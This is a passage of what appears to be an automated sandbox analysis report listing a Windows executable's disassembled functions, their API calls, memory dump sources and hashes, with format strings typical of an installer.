                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                            Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                            Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                            Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                            Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                            Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                            Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                            Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                            Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                            Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                            Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
